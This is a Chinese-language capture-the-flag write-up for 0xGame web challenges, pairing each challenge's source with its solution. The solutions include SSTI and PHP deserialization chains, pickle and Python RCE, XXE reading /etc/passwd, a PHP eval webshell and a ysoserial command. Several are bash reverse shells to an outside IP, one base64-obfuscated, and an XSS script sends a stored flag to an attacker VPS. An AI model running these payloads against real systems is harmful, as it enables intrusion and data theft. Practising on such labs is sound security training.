0xGame
Round1
ez_rce
源码:
from flask import Flask, request
import subprocess
app = Flask(__name__)
@app.route("/")
def index():
return open(__file__).read()
@app.route("/calc", methods=['POST'])
def calculator():
expression = request.form.get('expression') or "114 1000 * 514 + p"
result = subprocess.run(
["dc", "-e", expression],
capture_output=True,
text=True
)
return result.stdout
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8000)
ez_sql
sqlite数据库
sqlite_master特殊表,存储
?id=0 union select 1,2,3,4,sql from sqlite_master;
?id=0 union select 1,2,3,4,flag from flag;
ez_ssti
源码:
from flask import Flask, request, render_template, render_template_string
import os
app = Flask(__name__)
flag=os.getenv("flag")
os.unsetenv("flag")
@app.route('/')
def index():
return open(__file__, "r").read()
@app.errorhandler(404)
def page_not_found(e):
print(request.root_url)
return render_template_string("<h1>The Url {} You Requested Can Not Found</h1>".format(request.url))
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8000)
这里为了不被fenjing梭了,使用了如下操作,这里unsetenv只会把环境变量里的flag删掉,但是不会删掉flag这个变量
flag=os.getenv("flag")
os.unsetenv("flag")
我们需要从拿到当前模块也就是__main__然后就能拿flag,__main__.flag
这里主要就是怎么拿__main__,可以通过拿sys模块,sys模块里有全部被导入的模块
{{x.__init__.__globals__['__builtins__']["__import__"]('sys').modules['__main__'].flag}}
ez_unser
源码:
<?php
highlight_file(__FILE__);
class Man{
private $name="原神,启动";
public function __wakeup()
{
echo str_split($this->name);
}
}
class What{
private $Kun="两年半";
public function __toString()
{
echo $this->Kun->hobby;
return "Ok";
}
}
class Can{
private $Hobby="唱跳rap篮球";
public function __get($name)
{
var_dump($this->Hobby);
}
}
class I{
private $name="Kobe";
public function __debugInfo()
{
$this->name->say();
}
}
class Say{
private $evil;
public function __call($name, $arguments)
{
$this->evil->Evil();
}
}
class Mamba{
public function Evil()
{
$filename=time().".log";
file_put_contents($filename,$_POST["content"]);
echo $filename;
}
}
class Out{
public function __call($name,$arguments)
{
$o = "./".str_replace("..", "第五人格",$_POST["o"]);
$n = $_POST["n"];
rename($o,$n);
}
}
unserialize($_POST["data"]);
__debugInfo(): 当通过var_dump() 打印对象时该函数就会被调用
第一条链子写木马文件调用到Mamba::Evil()
<?php
class Man{
private $name;
public function __construct()
{
$this->name=new What();
}
}
class What{
private $Kun="两年半";
public function __construct(){
$this->Kun = new Can();
}
}
class Can{
private $Hobby="唱跳rap篮球";
public function __construct(){
$this->Hobby = new I;
}
}
class I{
private $name="Kobe";
public function __construct(){
$this->name=new Say();
}
}
class Say{
private $evil;
public function __call($name, $arguments)
{
$this->evil->Evil();
}
}
class Mamba{
public function Evil()
{
$filename=time().".log";
file_put_contents($filename,$_POST["content"]);
echo $filename;
}
}
class Out{
public function __call($name,$arguments)
{
$o = "./".str_replace("..", "第五人格",$_POST["o"]);
$n = $_POST["n"];
rename($o,$n);
}
}
$man=new Man();
echo urlencode(serialize($man));
第二条更改文件名字,调用到Out::__call
<?php
class Man{
private $name;
public function __construct()
{
$this->name=new What();
}
}
class What{
private $Kun="两年半";
public function __construct(){
$this->Kun = new Can();
}
}
class Can{
private $Hobby="唱跳rap篮球";
public function __construct(){
$this->Hobby = new I;
}
}
class I{
private $name="Kobe";
public function __construct(){
$this->name=new Out();
}
}
class Say{
private $evil;
public function __call($name, $arguments)
{
$this->evil->Evil();
}
}
class Mamba{
public function Evil()
{
$filename=time().".log";
file_put_contents($filename,$_POST["content"]);
echo $filename;
}
}
class Out{
public function __call($name,$arguments)
{
$o = "./".str_replace("..", "第五人格",$_POST["o"]);
$n = $_POST["n"];
rename($o,$n);
}
}
$man=new Man();
echo urlencode(serialize($man));
Round2
baby_pe
算pin码
suid提权
find / -name flag
find: ‘/find’: No such file or directory
/root/flag
find: ‘/proc/1/task/1/fdinfo’: Permission denied
find: ‘/proc/1/map_files’: Permission denied
find: ‘/proc/1/fdinfo’: Permission denied
find: ‘/proc/7/task/7/fdinfo’: Permission denied
find: ‘/proc/7/task/8/fdinfo’: Permission denied
find: ‘/proc/7/task/27/fdinfo’: Permission denied
find: ‘/proc/7/map_files’: Permission denied
find: ‘/proc/7/fdinfo’: Permission denied
find: ‘/proc/28/task/28/fdinfo’: Permission denied
find: ‘/proc/28/map_files’: Permission denied
find: ‘/proc/28/fdinfo’: Permission denied
find: ‘/proc/31/task/31/fdinfo’: Permission denied
find: ‘/proc/31/map_files’: Permission denied
find: ‘/proc/31/fdinfo’: Permission denied
find: ‘/proc/32/task/32/fdinfo’: Permission denied
find: ‘/proc/32/map_files’: Permission denied
find: ‘/proc/32/fdinfo’: Permission denied
/flag
找到flag位置
baby_pickle
源码:
import pickle
from flask import Flask, request
from base64 import b64decode
app = Flask(__name__)
UserPool = {}
BlackList = [b'\x00', b'\x1e', b'system', b'popen', b'os', b'sys', b'posix']
class User:
username = None
password = None
@app.route('/')
def index():
return open(__file__).read()
@app.route('/login', methods=['POST'])
def login():
data = request.form.get('data')
if data is not None:
opcode = b64decode(data)
for word in BlackList:
if word in opcode:
return "Hacker!"
user = pickle.loads(opcode)
print(user)
return "<h1>Hello {}</h1>".format(user.username)
else:
username = request.form.get('username')
password = request.form.get('password')
if username in UserPool.keys() and password == UserPool[username].password:
return "<h1>Hello {}</h1>".format(User.username)
@app.route('/register', methods=['POST'])
def register():
username = request.form.get('username')
password = request.form.get('password')
if username in UserPool.keys():
return "<h1>用户{}已存在</h1>".format(username)
UserPool[username] = password
return "<h1>注册成功</h1>"
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8000)
Payload:
import pickle
import pickletools
opcode=b'''c__builtin__
eval
(S'__import__("pty").spawn([\'bash\',\'-c\',\'bash -i >& /dev/tcp/175.27.229.115/2333 0>&1\'])'
tR.
'''
pickletools.dis(opcode)
result = pickle.loads(opcode)
print(result)
print(base64.b64encode(opcode).decode())
builtins.evel代替os.system,pty.spawn代替os.system
baby_ssrf
源码:
from flask import Flask, request
import os
from urllib.parse import urlparse, urlunparse
import subprocess
import socket
app = Flask(__name__)
BlackList=[
"127.0.0.1"
]
@app.route('/')
def index():
return open(__file__).read()
@app.route('/cmd',methods=['POST'])
def cmd():
if request.remote_addr != "127.0.0.1":
return "Forbidden"
if request.method == "GET":
return "Hello World!"
if request.method == "POST":
return os.popen(request.form.get("cmd")).read()
@app.route('/visit')
def visit():
url = request.args.get('url')
if url is None:
return "No url provided"
url = urlparse(url)
realIpAddress = socket.gethostbyname(url.hostname)
if url.scheme == "file" or realIpAddress in BlackList:
return "Hacker!"
result = subprocess.run(["curl","-L", urlunparse(url)], capture_output=True, text=True)
# print(result.stderr)
return result.stdout
if __name__ == '__main__':
app.run(host='0.0.0.0',port=8000)
urlparse方法解析url
from urllib.parse import urlparse
result=urlparse('http://www.baidu.com/index.html;user?id=5#comment')
print(type(result),result)
#########
<class 'urllib.parse.ParseResult'> ParseResult(scheme='http', netloc='www.baidu.com', path='/index.html', params='user', query='id=5', fragment='comment')
这里提供cmd路由,要求必须是127.0.0.0
还提供了visit路由存在ssrf漏洞,我们可以通过gopher发POST包,然后需要绕过127.0.0.1,使用0或者127.1或者0.0.0.0可以绕过
先伪造cmd命令,必须有的是CT头和CL头,注意CL头的长度要正确
然后gopher发包,使用0.0.0.0绕过127.0.0.1成功欺骗成127.0.0.1访问
baby_xxe
源码:
from flask import Flask,request
import base64
from lxml import etree
app = Flask(__name__)
@app.route('/')
def index():
return open(__file__).read()
@app.route('/parse',methods=['POST'])
def parse():
xml=request.form.get('xml')
print(xml)
if xml is None:
return "None"
parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
root = etree.fromstring(xml, parser)
name=root.find('name').text
return name or None
if __name__=="__main__":
app.run(host='0.0.0.0',port=8000)
load_dtd=True表示允许加载 DTD,name=root.find('name').text表示根元素里必须有name子元素
有回显且无过滤只要满足子元素是name就可以,直接读文件,burpsuite进行url编码
<?xml version="1.0"?>
<!DOCTYPE test [
<!ELEMENT test ANY >
<!ENTITY ddd SYSTEM "file:///etc/passwd">
]>
<test><name>&ddd;</name></test>
hello_shell
源码:
<?php
highlight_file(__FILE__);
$cmd = $_REQUEST['cmd'] ?? 'ls';
if (strpos($cmd, ' ') !== false) {
echo strpos($cmd, ' ');
die('no space allowed');
}
@exec($cmd); // 没有回显怎么办?
考的是无回显RCE,可以进行mv操作
?cmd=mv%09/flag%091.txt
但是不知道flag位置,或者是没有权限,最好是弹shell
%09或者${IFS}绕过空格,使用{echo,base64编码}|{base64,-d}|{bash,-i}避免产生歧义
bash%09-c%09'{echo,YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xNzUuMjcuMjI5LjExNS8yMzMzIDA%2bJjE%3d}|{base64,-d}|{bash,-i}'
没有读根目录的权限,尝试suid提权
find / -user root -perm -4000 -print 2>/dev/null
当前目录存在wc,所以应该是wc提权
LFILE=/flag
./wc --files0-from "$LFILE"
这里输出报错信息是因为 wc命令本身并不会显示文件的内容,而是输出统计信息,而当发生错误时,文件内容会出现在消息中,所以可以通过查看报错信息来查看文件内容
picture
pht后缀绕过php检测,图片马里用<?=eval($_POST["cmd"]);?>
Round3
Next.db
源码:
import { MongoClient } from 'mongodb';
const uri = process.env.MONGODB_URI || "mongodb://127.0.0.1:27017/";
const client = new MongoClient(uri);
export default async function handler(req, res) {
if (req.method !== 'POST') {
return res.status(405).json({ message: 'Method not allowed' });
}
const { name } = req.body;
if (!name) {
return res.status(500).json({ message: 'Name is required' });
}
if (name === "flag") {
return res.status(500).json({ message: 'You are not allowed to search for the flag' });
}
try {
const db = client.db('next-db');
const collection = db.collection('frameworks');
const results = await collection.find({
$or: [
{ name },
{
$and: [
{ description: { $regex: name.toString(), $options: 'i' } },
{ description: { $ne: process.env.FLAG || "flag{test}" } }
]
}
]
}).toArray();
res.status(200).json(results);
} catch (error) {
console.error('Database query error:', error);
res.status(500).json({ message: 'Internal Server Error' });
}
}
它提示MongoDB,所以是Nosql的题目
永真式能得到全部数据,这里本来想做个验证,没想到直接出了,就考这个吗?
{
"name": {
"$ne": 1
}
}
以下是预期解:
第⼆段代码在查询语句⾥⾯, 可以看到精确匹配的时候直接使⽤了 name, ⽽模糊匹配时却使⽤了 name.toString(), 这⾥其实也在暗⽰⼤家 name 变量的类型可能不⼀定是字符串
我们可以给 name 变量传⼊⼀个数组或对象
// 传⼊数组 (Array)
{
"name": [1, 2, 3]
}
// 传⼊对象 (Object)
{
"name": {"a": "b"}
}
这里Payload就是利用$eq运算符构造出name==flag
{
"name": {"$eq": "flag"} // 在 MongoDB 中查询 name == flag 的内容
}
hello_jwt
获取两个hint,一个是无密钥,一个是已知密钥,最后得到信息:密钥不长且都是小写字母,相当于已知字符集
所以就可以使用c-jwt-crack进行爆破了
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJyb2xlIjoiZ3Vlc3QifQ.IPy5S15HFohAfuc9bh7Nii22d5ijKlVZ_31KrAJLQaM abcdefghijklmnopqrstuvwxyz
然后伪造jwt,访问/flag就行了
import jwt
token = jwt.encode(
{
"username": "a",
"role": "admin",
},
key="zrajz",algorithm="HS256").encode(encoding='utf-8')
print(token)
WhySoSerial
jadx反编译在pom.xml发现使用了commons-collections3.2.1
直接拿工具梭的
有不同gadget
java -jar ysoserial-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUuMjcuMjI5LjExNS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"|base64
cargo_shop
提示:i32 和 u32 有什么区别呢?
主要区别:
符号:
-
i32 可以表示正数和负数。-
u32 只能表示非负整数(0 或正数)。范围:
-
i32 的范围是-2,147,483,648 到2,147,483,647。-
u32 的范围是0 到4,294,967,295。
计算花销的逻辑是:let costs = (goods.price * count) as i32;
count传入的逻辑是u32,如果让costs为负值呢,测试后无果,但是还有一个思路,使用超出i32范围的数字造成整数溢出
然后就能买flag了
paste_bin
考点:XSS和CSP绕过
提示:
关注前端的 HTML, JS 和后端的 src/bot.rs 即可, 其它代码不重要
什么是 Content-Security-Policy?
尝试将 payload 塞到 iframe 标签的 srcdoc 属性里面
unpkg 和 jsdelivr 是什么? 有什么用?
题目给了全部源码
let js = format!("localStorage.setItem('flag', '{}');", flag);这里指定flag在localStorage里面
CSP是这样的
base-uri 'none'; style-src 'unsafe-inline'; script-src 'self' 'sha256-mDsn/yxO0Kbxaggx7bFdeBmrC22U6cePGEUeeSwO+n0=' cdn.tailwindcss.com unpkg.com cdn.jsdelivr.net;
仅写成了unpkg.com,没有指定是unpkg.com/xxx
所以我们可以将xxx为自己的库,库里写上恶意代码,让其加载我们库里的恶意代码
npm login登录自己的npm库https://www.npmjs.com
代码写好npm init(一直回车默认就行)
然后npm publish就行了
https://unpkg.com/m1xian@1.0.0/index.js
对应自己的npm库https://www.npmjs.com/package/m1xian
exp.js
let flag = localStorage.getItem('flag');
location.href = 'http://vps_ip:2333/?flag=' + flag;
结果没拿到??没找到原因
Round 4
basic_flask
源码:
from flask import Flask, request
import json
app = Flask(__name__)
'''
'''
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class Dst():
def __init__(self):
pass
dst = Dst()
@app.route('/',methods=['GET','POST'])
def index():
if request.method=='GET':
return open("main.py").read()
merge(request.get_json(), dst)
return "Success"
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8000)
污染静态目录为根目录。然后读flag
读flag
basic_pwn
源码:
from flask import Flask, request
app = Flask(__name__)
functions=globals()['__builtins__'].__dict__
@app.route('/', methods=['GET'])
def index():
return open(__file__).read()
@app.route('/pwn',methods=['POST'])
def pwn():
stack = []
stack.append('print')
name=request.get_json().get("name")
if not name:
return "Fail"
stack.extend(name)
args=stack.pop()
func=stack.pop()
functions[func](args)
return "Success"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000)
和pwn没啥关系,很简单
直接上Payload
{
"name": [
"eval",
"__import__(\"os\").popen(\"bash -c 'bash -i >& /dev/tcp/175.27.229.115/2333 0>&1'\").read()"
]
}
弹shell
flag在env里
Jenkins
网上有exp,没啥意思
MySQL 客⼾端任意⽂件读取
https://github.com/rmb122/rogue_mysql_server
将此工具下载解压到vps上,然后file_list里加上/flag
database填/flag,没搞懂为什么
./rogue_mysql_server启动mysql服务器
然后在loot文件夹里拿到读取的flag
